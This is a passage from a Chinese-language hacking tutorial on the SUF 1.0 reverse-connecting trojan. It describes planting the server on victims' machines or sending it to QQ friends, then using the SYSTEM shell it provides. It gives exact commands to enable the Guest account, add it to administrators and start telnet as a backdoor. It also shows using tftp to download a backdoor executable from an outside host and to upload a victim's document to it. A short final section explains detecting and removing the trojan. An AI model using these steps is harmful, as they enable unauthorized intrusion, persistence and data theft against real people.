二、玩弄骨掌——轻松来控制
接下来是玩木马后门必不可少的环节,那就是种植木马。种植木马的方法、途径有很多,以前也专门有文章介绍过,大家可以发挥自己的聪明才智,把服务端上传到肉鸡或者发给QQ好友等,当服务端程序被运行后,一般的使用者很难感觉到计算机有异常,防火墙也不会出现报警。其实,一只黑手正在慢慢靠近,服务端程序会自动从FTP服务器中获取客户端的IP地址,然后开始反向连接,这时服务端计算机的IP地址就会出现在客户端的“上线列表”中(如图4)。
图 4
小提示:客户端计算机必须是直接连接到Internet,而不能是处于内网中,同时,如果开启了防火墙的话,请打开5915端口。
在“上线列表”中双击某一在线计算机的IP(例如:220.202.242.100),出现“连接到220.202.242.100”对话窗口,这就已经得到了目标计算机的一个系统权限的Shell,现在想干什么就自由发挥吧!
想想既然是送上门的肉鸡,还是留个后门,以便日后再次光顾吧!这里就将Guest帐户激活,并提升为管理员,再开启目标计算机的Telnet服务,下面就看如何来实现?请输入命令:net user guest /active:yes,点击“运行”来激活Guest帐户,再运行命令:net localgroup administrators guest /add,将Guest加入管理员组,最后再运行命令:net start telnet,开启目标计算机的远程登录服务(如图5)。
图5
其实,在这里有很多东东可以应用的,比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器 220.202.242.99,我们从服务器上下载一个后门程序Sy.exe,只要运行命令:tftp 220.202.242.99 get sy.exe;要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令:tftp 220.202.242.99 put Ccash.doc。
小提示:Windows自身附带了一个简单的文件上传下载程序Tftp.exe,可要建立TFTP服务器,就得借助TFTPD32了(下载地址:http://www.ldcatv.com/soft/tftpd32.rar)。
三、摆脱控制——隔离隧道
虽然SUF 1.0的实现方法非常隐蔽,可还是能够将其剿灭的,可以借助Active Ports(下载地址:http://www.ldcatv.com/soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了 SUF后门,就可在“Active Ports”主窗口中发现两个server.exe进程,其中一个通过4319端口与FTP服务器进行通讯,另一个通过4321端口与客户端计算机进行通讯(如图6)。选择它们,再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除,这样就摆脱了SUF的控制。
图 六
